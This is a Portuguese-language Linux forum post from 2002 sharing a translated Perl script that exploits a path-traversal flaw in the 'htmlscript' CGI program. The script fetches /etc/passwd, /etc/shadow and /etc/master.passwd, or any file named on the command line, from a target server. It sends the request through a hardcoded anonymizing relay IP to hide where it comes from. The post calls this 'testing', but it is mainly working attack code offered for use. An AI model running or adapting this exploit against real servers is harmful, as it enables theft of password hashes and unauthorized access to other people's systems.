Testando servers a HTMLSCRIPT
Publicado por Douglas Vigliazzi 13/12/2002
[ Hits: 4.458 ]
Este script testa servidores à vulnerabilidade de HTMLSCRIPT, o qual permite a obtenção de qualquer arquivo, inclusive o passwd e shadow.
Esta falha compromete bastante a segurança.
#!/usr/bin/perl -w # $Id: htmlscript.pl,v 1.1 1998/01/29 06:28:52 zap Exp $ # # Obtém /etc/{passwd,shadow,master.passwd} ou qualquer arquivo de servers # vulneraveis à htmlscript. A requisição HTTP será feita através de um # roteador anonimo. # # Copyright (c) 1998 by zap <zap@arosnet.se> # Tradução Douglas Vigliazzi e adaptação # $Log: htmlscript.pl,v $ # Initial revision # use strict; use Socket; my ($verbose, $onion_router, $onion_port, $onion_timeout, $iaddr, $paddr, $proto, $line); $verbose = 1; $onion_router = "132.250.80.12"; $onion_port = 9200; $onion_timeout = 10; $iaddr = inet_aton($onion_router); $paddr = sockaddr_in($onion_port, $iaddr); $proto = getprotobyname("tcp"); my ($victim, $file) = @ARGV or die "Usar: httpscript.pl <host> [<arquivo>]\n"; sub get_file { $SIG{"ALRM"} = sub { close(ONION); }; alarm $onion_timeout; socket(ONION, AF_INET, SOCK_STREAM, $proto); select(ONION); $| = 1; select(STDOUT); if (connect(ONION, $paddr)) { $SIG{"ALRM"} = "IGNORAR"; print "[ $victim:$file ]\n" if $verbose; print ONION "GET http://$victim/cgi-bin/htmlscript?../../../", "../../../../..$file\n\n"; while (defined($line = <ONION>)) { print $line } } else { die "Erro: Conexão para roteador $onion_router esgotada ", " ($onion_timeout\s).\n"; } close(ONION); } if ($file) { get_file; } else { $file = "/etc/passwd"; get_file; $file = "/etc/shadow"; get_file; $file = "/etc/master.passwd"; get_file; }
Testando multiplos servers a ataque DoS
script para encontrar verificar a vulnera bilidade RFI
Script de Analise do Syslog SNORT
Nenhum comentário foi encontrado.
Atenção a quem posta conteúdo de dicas, scripts e tal (2)
Criando um gateway de internet com o Debian
Configuração básica do Conky para mostrar informações sobre a sua máquina no Desktop
Aprenda a criar músicas com Inteligência Artificial usando Suno AI
Entendendo o que é URI, URL, URN e conhecendo as diferenças entre POST e GET
Ativando o Modo Noturno via Linha de Comando no GNOME/Wayland
Instalando Google Chrome no Fedora 40
Habilitando a importação de senhas no Firefox
Como corrigir o erro do VirtualBox travar a máquina virtual em tela cheia
Instalando Google Chrome no Ubuntu 24.04 LTS
Quantidade de caracteres suportados na barra de endereços dos navegadores
Como faço pra um script ser executado apenas abrindo um terminal e dan... (6)
Problema ao configurar Zabbix no ubuntu (9)
Iso win10 arm para galaxy book go NP34OXLA-K06BR (1)